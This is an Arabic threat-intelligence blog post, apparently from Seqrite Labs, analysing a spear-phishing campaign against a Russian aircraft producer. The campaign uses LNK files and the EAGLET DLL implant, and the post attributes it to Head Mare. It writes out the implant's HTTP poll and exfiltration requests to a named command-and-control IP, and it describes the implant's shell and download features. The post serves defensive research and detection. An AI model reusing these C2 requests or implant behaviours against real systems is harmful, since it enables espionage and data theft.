• المنتجات والخدمات
        • سحابة

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • على بريم

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • المنظومة

          • Malware Analysis Platform
        • أعمال صغيرة

          • SOHO Total Edition
        • الخدمات

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • الأمن السيبراني و Data Privacy الاجتماعي
  • الحلول
    • بفسي
    • قطاع التعليم
    • حكومة
    • قطاع الرعاية الصحية
    • تكنولوجيا المعلومات
    • تصنيع
  • الشركة
    • من نحن Seqrite
    • القيادة
    • الجوائز والشهادات
    • الأخبار
  • الشركاء
    • برنامج شريك
    • تحديد الشريك
    • إشترك معنا
  • الدعم
  • المصادر
    • مدونات
    • هيتيبابرز
    • البيانات
    • دراسات الحالة
    • تقارير التهديد
    • كتيبات
    • وجهة نظر
    • فهم Data Privacy
    • تحقق من درجة المخاطر الخاصة بك
    • حوارات DPDP
    • ساعة الخصوصية
Seqrite مختبرات المدونة
اتصل بنا المبيعات هل تتعرض للهجوم؟
  • المنتجات والخدمات
        • سحابة

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • على بريم

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • المنظومة

          • Malware Analysis Platform
        • أعمال صغيرة

          • SOHO Total Edition
        • الخدمات

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • الأمن السيبراني و Data Privacy الاجتماعي
  • الحلول
    • بفسي
    • قطاع التعليم
    • حكومة
    • قطاع الرعاية الصحية
    • تكنولوجيا المعلومات
    • تصنيع
  • الشركة
    • من نحن Seqrite
    • القيادة
    • الجوائز والشهادات
    • الأخبار
  • الشركاء
    • برنامج شريك
    • تحديد الشريك
    • إشترك معنا
  • الدعم
  • المصادر
    • مدونات
    • هيتيبابرز
    • البيانات
    • دراسات الحالة
    • تقارير التهديد
    • كتيبات
    • وجهة نظر
    • فهم Data Privacy
    • تحقق من درجة المخاطر الخاصة بك
    • حوارات DPDP
    • ساعة الخصوصية
الصفحة الرئيسية  /  خدمات  / عملية CargoTalon: UNG0901 تستهدف قطاع الفضاء والدفاع الروسي باستخدام زرع EAGLET.
عملية CargoTalon: UNG0901 تستهدف قطاع الفضاء والدفاع الروسي باستخدام زرع EAGLET.
23 يوليو 2025

عملية CargoTalon: UNG0901 تستهدف قطاع الفضاء والدفاع الروسي باستخدام زرع EAGLET.

كتب بواسطة سوبهاجيت سينغا
سوبهاجيت سينغا
خدمات

المحتويات

  • المقدمة
  • النتائج الأولية
  • سلسلة العدوى.
  • التحليل الفنى
    • المرحلة 0 – ملف البريد الإلكتروني الخبيث.
    • المرحلة 1 – ملف LNK الخبيث.
    • المرحلة الثانية – النظر في ملف الطعم.
    • المرحلة 3 – زرع EAGLET الخبيث.
  • الصيد والبنية التحتية.
    • تفاصيل البنية التحتية.
    • حملات مماثلة.
  • عزو
  • خاتمة
  • SEQRITE الحماية.
  • شركات النفط العالمية
  • ميتري أت&ك.

المقدمة

SEQRITE اكتشف فريق مختبرات APT مؤخرًا حملةً تستهدف قطاع صناعة الطيران الروسي. تستهدف هذه الحملة موظفي شركة فورونيج لإنتاج الطائرات (VASO)، إحدى كبرى شركات إنتاج الطائرات في روسيا، وذلك عبر استخدام وثائق النقل الجوي (TTN) - وهي وثائق بالغة الأهمية لعمليات الإمداد اللوجستي الروسية. يعتمد النظام البرمجي الخبيث المستخدم في هذه الحملة على استخدام ملف LNK الخبيث EAGLET DLL، والذي يقوم بدوره بتنفيذ أوامر خبيثة وسرقة البيانات.

في هذه المدونة، سنستكشف التفاصيل الفنية للحملة التي واجهناها خلال تحليلنا. سنتناول المراحل المختلفة لهذه الحملة، بدءًا من التعمق في سلسلة العدوى الأولية وصولًا إلى عملية الزرع المستخدمة فيها، وانتهاءً بنظرة عامة أخيرة تغطي الحملة.

النتائج الأولية

في الآونة الأخيرة، وتحديداً في 27 يونيو، عثر فريقنا أثناء بحثه عن مرفقات التصيد الاحتيالي الخبيثة على ملف بريد إلكتروني خبيث، ظهر على مصادر مثل VirusTotal ، وبعد مزيد من البحث، وجدنا أيضاً ملف LNK خبيث، كان مسؤولاً عن تنفيذ مرفق DLL الخبيث الذي كان نوع ملفه يتنكر على أنه مرفق ZIP.

عند مراجعة البريد الإلكتروني، وجدنا الملف Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip، والذي يُترجم إلى Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip، وهو في الأساس ملف DLL. وبعد البحث، وجدنا ملفًا آخر، وهو ملف اختصار [LNK]، يحمل الاسم نفسه. فقررنا بعد ذلك دراسة آلية عمل هذه الملفات.

سلسلة العدوى

 

التحليل الفنى

سنقوم بتقسيم تحليل هذه الحملة إلى ثلاثة أجزاء مختلفة، بدءًا من البحث في ملف EML الخبيث، متبوعًا بالمرفق Ie، وزرع DLL الخبيث وملف LNK.

المرحلة 0 – ملف البريد الإلكتروني الخبيث.

حسنًا، في البداية، وجدنا ملف بريد إلكتروني خبيثًا، باسم backup-message-10.2.2.20_9045-800282.eml، مُحمّل من روسيا الاتحادية. بعد التدقيق في تفاصيل ملف البريد الإلكتروني،

لقد وجدنا أن البريد الإلكتروني تم إرساله إلى موظف في جمعية إنتاج الطائرات فورونيج (VASO)، من مركز النقل والخدمات اللوجستية بخصوص مذكرة التسليم.

بالاطلاع على محتوى البريد الإلكتروني، وجدنا أنه مُصاغٌ لإبلاغ المُستلم بآخر أخبار حركة الشحن، مع الإشارة إلى إيصال شحن ( Товарно-транспортная накладная №391-44 от 26.06.2025 ). كما يحثّ محتوى البريد الإلكتروني المُستلم على الاستعداد لاستلام شحنة مُحددة خلال يومين أو ثلاثة. ولأننا لاحظنا سابقًا انتحال المُهاجم لشخصية فرد، لاحظنا أيضًا وجود مُرفق خبيث مُتنكر كملف ZIP. وبعد تنزيله، تبيّن لنا أنه ملف DLL خبيث مُدمج.

وبعيدًا عن عملية زرع DLL الخبيثة، قمنا أيضًا بمطاردة ملف LNK خبيث يحمل نفس الاسم، ونعتقد أنه تم إسقاطه بواسطة مرفق تصيد احتيالي آخر، والذي يستخدم لتنفيذ عملية زرع DLL هذه، والتي أطلقنا عليها اسم EAGLET.

في القسم التالي، سنلقي نظرة على ملف LNK الخبيث.

المرحلة 1 – ملف LNK الخبيث.

عند فحص ملف LNK، وجدنا أنه يُنفّذ مجموعةً مُحددةً من المهام، تُنفّذ في النهاية ملف DLL الخبيث، وتُظهر نافذةً منبثقةً وهميةً على الشاشة. ويتم ذلك بالطريقة التالية.

في البداية، يستخدم البرنامج النصي الثنائي powershell.exe لتشغيل هذا البرنامج النصي في الخلفية، والذي يقوم بإحصاء ملف ZIP المتنكر، والذي هو عبارة عن غرس EAGLET الخبيث، ثم في حالة العثور على الغرس الخبيث، فإنه ينفذه عبر rundll32.exe LOLBIN، وإلا في حالة فشله في العثور عليه فإنه يبحث بشكل متكرر عن الملف ضمن %USERPROFILE% وفي حالة العثور عليه فإنه يقوم بتشغيله، ثم إذا فشل في العثور عليه في هذا الموقع، فإنه يحاول البحث ضمن موقع %TEMP%.

بمجرد العثور على ملف DLL المزروع، يُنفَّذ البرنامج ثم يستخرج ملف XLS وهميًا مُضمَّنًا فيه، وذلك بقراءة ملف XLS بحجم 59904 بايت، والمُخزَّن مباشرةً بعد ملف البداية البالغ 296960 بايت، والذي يُكتب بعد ذلك في مجلد %TEMP% باسم ранспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. هذا هو الغرض من ملف LNK الخبيث، وسنتناول في القسم التالي ملف الخداع.

المرحلة الثانية - النظر في ملف الطعم.

في هذا القسم، سننظر في ملف XLS الوهمي، والذي تم استخراجه من ملف DLL المزروع.

في البداية، تبيّن لنا أن ملف .XLS المشار إليه مرتبط بكيان روسي خاضع للعقوبات، وهو شركة Obltransterminal LLC (ООО "Облтранстерминал")، المدرجة على قائمة OFAC SDN (المواطنين المعينين خصيصًا) التابعة لوزارة الخزانة الأمريكية. وقد فُرضت عقوبات على هذه المنظمة بموجب الأمر التنفيذي رقم 14024 لتورطها في البنية التحتية العسكرية واللوجستية الروسية.

ثم لاحظنا أن ملف XLS يحتوي على تفاصيل الحقول المنظمة لتسجيل رقم الحاوية، ونوعها، ووزنها الفارغ، وسعة حمولتها، ورقم ختمها، بالإضافة إلى معلومات المركبة والمنصة. والجدير بالذكر أنه يتضمن خانات اختيار لحالة الحاوية - محملة، فارغة، أو قيد الإصلاح - ومنطقة تخطيطية مخصصة لتحديد التلف المادي على الحاوية.

بعد ذلك، نلاحظ أن النموذج المُموّه يحتوي على قائمة مُفصّلة برموز تلف الحاويات المُستخدمة عادةً في العمليات اللوجستية الروسية . تُغطي هذه الرموز نطاقًا واسعًا من المشكلات الهيكلية والميكانيكية التي قد يتم رصدها أثناء فحص الحاوية. تتضمن القائمة مصطلحات مُحدّدة مثل الشقوق أو الثقوب (Трещина)، وتشوّهات العوارض العلوية والسفلية (Деформация верхних/нижних балок)، والتآكل (Сквозная коррозия)، وغياب أو تلف قضبان القفل، والمفصلات، والأختام المطاطية، والصفائح، ووصلات الزوايا. يتم ترقيم كل نوع من أنواع التلف بشكل منهجي من 1 إلى 24، مُحاكيًا بذلك وثائق الفحص المُوحّدة.

باختصار، يهدف هذا النظام التمويهي إلى محاكاة وثيقة فحص حاويات روسية رسمية، وتحديدًا تقرير تبادل المعدات (EIR)، المستخدم أثناء نقل أو تسليم حاويات الشحن. يتضمن هذا النظام حقولًا مُهيكلة لمواصفات الحاويات، وأرقام الأختام، والوزن، وبيانات المركبة، بالإضافة إلى مخططات توضيحية وقائمة موحدة تضم 24 رمزًا للأضرار، تغطي كل شيء من الشقوق والتشوهات إلى التآكل والأجزاء المفقودة المرتبطة بشركة Obltransterminal LLC . في القسم التالي، سنتناول عملية زرع برنامج EAGLET.

المرحلة 3 – زرع EAGLET الخبيث.

في البداية، عندما رأينا الغرسة وقمنا بتحميلها في أداة تحليل PE، تمكنا من تأكيد أن هذا هو ملف PE، مع تخزين الطعم داخل قسم التراكب، والذي رأيناه بالفعل مسبقًا.

بعد ذلك، عند فحص تصديرات ملف DLL الخبيث هذا، بحثنا في نقطة الدخول، وللأسف لم نجد أي شيء مثير للاهتمام. بعد ذلك، بحثنا في نقطة الدخول، مما قادنا إلى ملف DllMain الذي احتوى على شيفرة مثيرة للاهتمام تتعلق بسلوك خبيث.

الوظيفة الأولية المثيرة للاهتمام، والتي تقوم بشكل أساسي بإحصاء المعلومات حول الجهاز المستهدف.

في هذه الوظيفة، يمضي الكود قدمًا ويقوم بإنشاء GUID فريد للهدف، والذي سيتم استخدامه لتحديد هوية الضحية، في كل مرة يتم فيها تنفيذ الزرع يتم إنشاء GUID جديد، وهذا يحاكي سلوك معرف الجلسة الذي يساعد المشغل أو الفاعل في التهديد على الحصول على وضوح بشأن الهدف.

 

بعد ذلك، يُحصي اسم جهاز الكمبيوتر الخاص بالجهاز المستهدف، بالإضافة إلى اسم المضيف واسم نطاق DNS الخاص به. بعد استلامه، يُنشئ دليلًا باسم MicrosoftApppStore ضمن موقع ProgramData.

بعد ذلك، باستخدام CreateThread، يتم إنشاء سلسلة خبيثة، مسؤولة عن الاتصال بـ IP command-and-control[C2] وأكثر من ذلك بكثير.

بعد ذلك، يمكننا أن نرى أن الزرع يستخدم واجهات برمجة تطبيقات شبكات Windows معينة مثل WinHttpOpen لبدء جلسة HTTP، متخفية تحت سلسلة وكيل مستخدم غير شائعة المظهر MicrosoftAppStore/2001.0، والتي يتبعها بعد ذلك واجهة برمجة تطبيقات أخرى تُعرف باسم WinHtppConnect والتي تحاول الاتصال بخادم الأوامر والتحكم [C2] المبرمج وهو 185.225.17.104 عبر المنفذ 80، وفي حالة فشله، يستمر في إعادة المحاولة.

في حال اتصال الغرسات بوحدة التحكم والقيادة (C2)، يُشكّل ذلك مسار URL يُستخدم لإرسال طلب GET إلى بنية C2 التحتية. يبدو نص الطلب بالكامل كما يلي:

احصل على /poll?id=<{randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1Host: 185.225.17.104

بعد إرسال الطلب، يحاول البرنامج المزروع قراءة استجابة HTTP من خادم C2، والتي قد تحتوي على تعليمات لتنفيذ تعليمات معينة.

فيما يتعلق بالوظائف، يدعم الزرع الوصول إلى shell، والذي يمنح مشغل C2 أو الجهة الفاعلة في التهديد غلافًا على الجهاز المستهدف، والذي يمكن استخدامه بشكل أكبر لأداء أنشطة ضارة.

من الميزات الأخرى في هذا الزرع ميزة التنزيل، والتي تُنزّل محتوى ضارًا من الخادم أو تُخرِج الملفات المطلوبة أو المهمة من الجهاز المُستهدَف. إحدى هذه الميزات هي تنزيل المحتوى الضار من الخادم وتخزينه في المسار C:\ProgramData\MicrosoftAppStore\. ونظرًا لأن مركز التحكم الثاني (C2) معطل حاليًا، وأثناء نشر هذا البحث، لم يتم اكتشاف الملفات المُستخدَمة.

لاحقًا، اتضح وجود وظيفة أخرى غير مرتبطة بميزة التنزيل هذه، وهي أن عملية الزرع تقوم أساسًا باستخراج الملفات من الجهاز المستهدف. يبدو نص الطلب كالتالي:

POST /result HTTP/1.1Host: 185[.]225[.]17[.]104Content-Type: application/x-www-form-urlencoded id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==

لذلك، الميزات هي كما يلي.

الميزات الكلمة الرئيسية المحفزة سلوك الهدف
تنفيذ الأمر كمد: ينفذ أمر shell المستلم من خادم C2 ويلتقط الإخراج تنفيذ التعليمات البرمجية عن بعد
تحميل الملف تحميل: يقوم بتنزيل ملف من موقع بعيد ويحفظه في C:\ProgramData\MicrosoftAppStore\ مرحلة الحمولة
exfiltration (تلقائي) يرسل نتيجة تنفيذ الأمر أو حالة التنزيل إلى خادم C2 عبر HTTP POST استخراج البيانات

هذا هو ملخص التحليل الفني لزرعة EAGLET، وبعد ذلك سننظر في الجزء الآخر، والذي يركز على المعرفة الأساسية ومطاردة الحملات المماثلة.

الصيد والبنية التحتية

تفاصيل البنية التحتية

في هذا القسم، سنتناول تفاصيل البنية التحتية. بدايةً، نجد أن C2، الذي وجدنا أنه 185[.]225[.]17[.]104، هو المسؤول عن الاتصال بزراعة EAGLET. يقع خادم C2 في رومانيا، تحت رقم ASN 39798 لشركة MivoCloud SRL.

بعد البحث والتدقيق، وجدنا أن العديد من سجلات نظام أسماء النطاقات (DNS) السلبية تشير إلى بنية تحتية تاريخية كانت مرتبطة سابقًا بنفس مجموعة التهديدات المرتبطة بـ TA505، والتي سبق أن بحثها باحثون في BinaryDefense . تشير سجلات DNS إلى استخدام بنية تحتية مماثلة أو مُعاد استخدامها في هذه الحملة. إضافةً إلى ذلك، وبغض النظر عن الارتباطات البنيوية مع TA505 من حيث استخدام نطاقات مُعاد استخدامها، لاحظنا أيضًا وجود نطاقات مشبوهة أخرى تحمل سجلات DNS تشير إلى نفس البنية التحتية. وبثقة عالية، نؤكد أن الحملة الحالية لا علاقة لها بـ TA505، باستثناء المعلومات المذكورة آنفًا.

على غرار الحملة التي تستهدف قطاع الطيران والفضاء، رصدنا حملة أخرى تستهدف القطاع العسكري الروسي عبر وثائق تتعلق بالتجنيد. وفي تلك الحملة، استخدم المُهدّد برمجية EAGLET المزروعة، والمتصلة بجهاز C2، أي 188[.]127[.]254[.]44، الموجود في روسيا تحت رقم ASN 56694، التابع لشركة Smart Ape.

حملات مماثلة

الحملة 1 – الاستهداف العسكري

في البداية، رأينا نص عنوان URL، والعديد من الآثار السلوكية الأخرى للزرع، مما قادنا إلى مجموعة أخرى من الحملات، مع زرع مماثل تمامًا، يستخدم لاستهداف التجنيد العسكري الروسي.

تم استخراج هذا الطعم من غرسة EAGLET، واسمها Договор_РН83_изменения.zip، والتي تُترجم إلى Contract_RN83_Changes، والتي تستهدف الأفراد والجهات المرتبطة بالتجنيد العسكري الروسي. كما يتضح، يُبرز هذا الطعم مزايا متعددة للخدمة، بما في ذلك تحويل الرهن العقاري إلى معاش تقاعدي، وغيرها الكثير.

الحملة الثانية - زرع EAGLET بدون أي طُعم مدمج

كما رأينا في الحملات السابقة، أنه في بعض الأحيان، يقوم كيان التهديد بإسقاط LNK خبيث، والذي ينفذ عملية زرع DLL ويستخرج الطُعم الموجود داخل قسم تراكب الزرعة، ولكن في هذه الحملة، رأينا أيضًا عملية زرع، دون وجود مثل هذا الطُعم في الداخل.

إلى جانب ذلك، لاحظنا أيضًا تداخلات متعددة لهذه الحملات ذات الاهتمامات المستهدفة المتشابهة وتداخل رمز الزرع مع الكيان التهديدي المعروف باسم Head Mare والذي كان يستهدف الكيانات الناطقة بالروسية التي اكتشفها الباحثون في كاسبرسكي في البداية.

عزو

يُعدّ الإسناد معيارًا أساسيًا لوصف جهة أو مجموعة تهديد. ويشمل تحليل وربط مجالات مختلفة، بما في ذلك التكتيكات والتقنيات والإجراءات، وتشابه الأكواد البرمجية وإعادة استخدامها، ودوافع الجهة المُهدّدة، وأحيانًا الأخطاء التشغيلية، مثل استخدام تسميات ملفات أو أدوات وهمية متشابهة.

خلال متابعتنا المستمرة لـ UNG0901، اكتشفنا أوجه تشابه وتداخل ملحوظة مع مجموعة التهديد المعروفة باسم Head Mare، والتي حددها باحثون في كاسبرسكي. دعونا نستكشف بعض أوجه التشابه الرئيسية بين Head Mare وUNG0901.

التداخلات الرئيسية بين UNG0901 والفرس الرئيسية

  1. ترسانة الأدوات:

لاحظ باحثون في كاسبرسكي أن برمجية Head Mare غالبًا ما تستخدم بابًا خلفيًا قائمًا على لغة Golang يُعرف باسم PhantomDL، والذي غالبًا ما يُحمّل باستخدام حزمة برامج مثل UPX، والتي تتميز بميزات بسيطة وعملية للغاية، مثل shell وdownload وupload وexit. وبالمثل، نشر UNG0901 أيضًا برمجية EAGLET، التي تُظهر سلوكًا مشابهًا، وتحتوي على ميزات متشابهة تقريبًا، مثل shell وdownload وupload وغيرها، وهي مبرمجة بلغة C++.

  1. تقنية تسمية الملفات:

لاحظ باحثون في كاسبرسكي أن برمجية PhantomDL الخبيثة تُستخدم غالبًا عبر التصيد الاحتيالي باستخدام أسماء ملفات مثل Contract_kh02_523، وبالمثل، في الحملات التي شهدناها ضد UNG0901، كانت هناك أسماء ملفات بأسلوب مشابه مثل Contract_RN83_Changes. كما وجدنا العديد من مخططات تسمية الملفات الأخرى المشابهة.

  1. التحفيز:

استهدف Head Mare كيانات مهمة مرتبطة بروسيا، في حين استهدف UNG0901 أيضًا العديد من الكيانات المهمة التابعة لروسيا.

بالإضافة إلى ذلك، هناك العديد من أوجه التشابه الإضافية والقوية التي تعزز الارتباط بين هذين الكيانين التهديديين؛ لذلك، فإننا نعزو كيان التهديد UNG0901 إلى الموارد المشتركة والعديد من أوجه التشابه الأخرى مع Head Mare، والذي يستهدف الكيانات الحكومية وغير الحكومية الروسية.

خاتمة

يُظهر UNG0901، أو المجموعة المجهولة 901، عملية سيبرانية مُستهدفة ضد قطاعي الطيران والدفاع الروسيين باستخدام رسائل بريد إلكتروني مُوجّهة للتصيد الاحتيالي وزرع ملف DLL مُخصّص من نوع EAGLET للتجسس واستخراج البيانات. يتداخل UNG0901 أيضًا مع Head Mare، والذي يُظهر أوجه تشابه عديدة، مثل استخدام أسماء وهمية، وغير ذلك الكثير.

SEQRITE الحماية

  • وكيل سي آي آر
  • trojan.49644.SL

شركات النفط العالمية

نوع الملف اسم الملف SHA-256
LNK Договой_РН83_изменения.pdf.lnk a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e75697c
Transportnaya_накладная_ТТН_№391-44_от_26.06.2025.xls.lnk 4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720ca6c5
DLL Договой_РН83_изменения.zip 204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e
Transportnaya_накладная_ТТН_№391-44_от_26.06.2025.zip 01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be
لا يوجد b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a
Договой_РН83_изменения.zip 413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08
طُعم[XLS/ PDF] ملف pdf مؤقت 02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809786
العينة المستخرجة.xls f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2a0d
80650000 3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7aff
العينة المستخرجة.xls c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2032e
العينة المستخرجة.xls 44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0d652
العينة المستخرجة.xls e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a8551064204
العينة المستخرجة.xls a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b0683401
ملف البريد الإلكتروني رسالة احتياطية-10.2.2.20_9045-800282.eml ae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8bfd7

MITER ATT & CK

تكتيك تقنية ID تفاصيل
الوصول الأولي مرفق التصيد الرمحي T1566.001 تم إرسال ملف .EML ضار إلى موظف VASO، ينتحل صفة مركز لوجستي باستخدام إغراء مستند TTN.
التنفيذ تنفيذ الوكيل الثنائي للنظام: Rundll32 T1218.011 تم تنفيذ عملية زرع DLL عبر rundll32.exe LOLBIN الموثوق بها، والتي تم استدعاؤها من ملف .LNK.
بوويرشيل T1059.001 يتم استخدامه لتحديد موقع ملف DLL المزروع وتشغيله من أدلة احتياطية متعددة.
إصرار غرس في ملف DLL مُقنع بـ ZIP [مخصص] يتخفى ملف DLL في صورة ملف .ZIP — يتم الضمن في الاستمرارية من خلال عمليات التنفيذ التي يتحكم فيها المشغل.
التهرب الدفاعي التنكر T1036 زرع متخفي في شكل ملف ZIP، ملف XLS وهمي يستخدم لمحاكاة المستندات اللوجستية المعتمدة.
الاكتشاف اكتشاف معلومات النظام T1082 يقوم بتجميع اسم المضيف واسم الكمبيوتر والنطاق؛ ويقوم بإنشاء معرف GUID للضحية لتحديد الهدف.
اكتشاف ثقة المجال T1482 يقوم بإحصاء نطاق DNS الخاص بالضحية لتحديد ملف تعريف الشبكة.
القيادة والسيطرة بروتوكول طبقة التطبيق: HTTP T1071.001 يتواصل مع C2 عبر HTTP؛ يستخدم MicrosoftAppStore/2001.0 User-Agent.
التشكيلات البيانات من النظام المحلي T1005 يقوم باستخراج تفاصيل النظام ومحتويات الملف وفقًا لأوامر الجهة المهاجمة.
exfiltration تسلل عبر قناة C2 T1041 طلبات POST إلى نقطة النهاية /result على C2 مع نتائج الأوامر المشفرة أو البيانات المستخرجة.
التأثير استخراج البيانات T1537 سرقة بيانات مستهدفة من قطاع الفضاء والطيران الروسي.

المؤلف:

سوبهاجيت سينغا

ساثويك رام براكي

 الصفحة السابقةبرنامج Cryptojacker الذي يعمل على نظام أندرويد متنكر في صورة تطبيق مصرفي يستغل موقع الجهاز
الصفحة التالية  لماذا Threat Intelاليقظة هي الحلقة المفقودة في أمنك السيبراني...
سوبهاجيت سينغا

نبذة عن سوبهاجيت سينغا

يعمل سوبهاجيت كباحث أمني في مختبرات الأمن بشركة كويك هيل. وتشمل مجالات تركيزه ما يلي: threat intelالاجتهاد والبحث إلى جانب الهندسة العكسية لـ...

مقالات بقلم سوبهاجيت سينغا »

منشورات ذات علاقة

  • عملية كويكسيلفر: جهة فاعلة مرتبطة بالصين تستهدف دبلوماسيين من ميانمار عبر باب خلفي مُخبأ بتقنية VHD

    عملية كويكسيلفر: جهة فاعلة مرتبطة بالصين تستهدف دبلوماسيين من ميانمار عبر باب خلفي مُخبأ بتقنية VHD

    17 أغسطس 2026
  • إساءة استخدام سير العمل التجاري الموثوق به: حملة سرقة وهمية متعددة المراحل

    22 يوليو، 2026
  • ما وراء عملية استرداد الأموال: من التصيد الاحتيالي لضريبة السلع والخدمات إلى برنامج Remcos RAT عبر سلسلة عدوى متعددة المراحل لبرامج .NET

    17 يوليو، 2026
المؤلفون المميزون
  • Seqrite
    Seqrite

    Seqrite هي شركة رائدة في مجال توفير حلول الأمن السيبراني للمؤسسات. مع التركيز على...

    قراءة المزيد من المقالات التي كتبها Seqrite
  • جوتي كارليكار
    جوتي كارليكار

    أنا كاتب متعطش أستمتع بصياغة محتوى حول التقنيات الناشئة و...

    اقرأ المزيد من المقالات التي كتبها جيوتي كارليكار
  • بينيش ب
    بينيش ب

    أنا شغوفٌ بالأمن السيبراني وكاتبٌ مُتفانٍ. لديّ موهبةٌ...

    اقرأ المزيد من مقالات بينيش ب.
  • سانجاي كاتكار
    سانجاي كاتكار

    سانجاي كاتكار هو المدير الإداري المشترك لشركة Quick Heal Technologies...

    اقرأ المزيد من مقالات سانجاي كاتكار
المواضيع
عرضة (25) هجوم إلكتروني (36) الهجمات الالكترونية (58) هجوم إلكتروني (16) هجمات الكترونية (15) الأمن السيبراني (342) الأمن الإلكتروني (34) التهديد السيبراني (33) تهديدات الإنترنت (51) البيانات الاختراق (56) خروقات البيانات (29) فقدان البيانات (28) منع فقدان البيانات (34) data privacy (16) حماية البيانات (34) أمن البيانات (19) DLP (50) DPDP (14) قانون حماية البيانات الشخصية (17) التشفير (16) أمن نقطة النهاية (113) أمن المؤسسة (20) استغلال (13) GDPR (14) البرمجيات الخبيثة (76) تحليل البرمجيات الخبيثة (14) هجوم البرمجيات الخبيثة (23) MDM (27) Microsoft (15) MITER ATT & CK (14) أمن الشبكة (26) التصيد (30) الفدية (69) هجوم الفدية (31) رانسوموار الهجمات (31) حماية ransomware (17) Seqrite (41) Seqrite التشفير (27) Seqrite ربحية السهم (33) Seqrite الخدمات (16) كشف التهديد (14) Threat Intelليغنس (22) UTM (34) الثغرة الأمنية (16) الثقة صفر (13)
Seqrite مختبرات

مزود حلول أمن تكنولوجيا المعلومات الرائد للمؤسسات يعمل على تبسيط أمان نقاط النهاية والبيانات والشبكات من خلال أفضل حلول الوقاية من التهديدات واكتشافها والاستجابة لها في جميع أنحاء العالم.

اقرأ المزيد عن Seqrite

تابعنا:

اشترك في نشرتنا الإخبارية

ابق على اطلاع بأحدث اتجاهات ورؤى الأمن السيبراني.

تحميل
المنتجات والخدمات
  • سحابة
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • على بريم
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • المنظومة
  • Malware Analysis Platform
  • الأعمال الصغيرة
  • SOHO Total Edition
  • الخدمات
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • الأمن السيبراني و Data Privacy الاجتماعي
المصادر
  • مدونات
  • هيتيبابرز
  • البيانات
  • تقارير التهديد
  • كتيبات
  • وجهة نظر
  • فهم Data Privacy
  • حوارات DPDP
  • السياسة والامتثال
  • اتفاقية ترخيص المستخدم النهائي
  • جو ديب ايه اي
  • SIA
  • ساعة الخصوصية
اتصل بنا
  • المكاتب المسجلة
  • دعونا نتحدث عن الأمن السيبراني
الدعم
  • الدعم الفني
  • لتحميل البرامج
  • التحديث دون اتصال بالإنترنت
  • ترقيات البرامج الثابتة
  • ترقيات
  • وثائق المنتج
معلومات عنا
  • من نحن Seqrite
  • القيادة
  • الجوائز والتكريم
  • الأخبار
شريك
  • برنامج شريك
  • تحديد الشريك
  • إشترك معنا
  • Seqrite الشهادات

© 2026 شركة كويك هيل تكنولوجيز المحدودة.

خريطة الموقع سياسات الخصوصية ملاحظات قانونية سياسات ملفات تعريف الارتباط شروط الاستخدام